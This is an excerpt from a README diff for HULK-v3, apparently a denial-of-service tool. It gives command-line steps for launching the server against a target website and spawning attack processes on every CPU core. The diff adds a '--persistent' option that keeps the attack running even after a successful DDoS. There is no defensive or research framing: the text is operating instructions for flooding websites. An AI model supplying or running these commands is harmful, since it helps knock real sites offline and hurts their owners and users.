Hyperclaw79/HULK-v3/README.md

 2. Launch the `hulk-server.py` with the target website as arg.
     >  `python hulk-server.py https://testdummysite.com`
+    > Append `--persistent` at the end of the above command if you want a continuous attack even after a succesfull DDoS.
+    > You can press `Ctrl` + `C` (KeyboardInterrupt) to stop and change the target.

 3. Launch the `hulk-launcher.py` to spawn multiple processes of hulk - one per CPU Core.
     >  `python hulk-launcher.py localhost`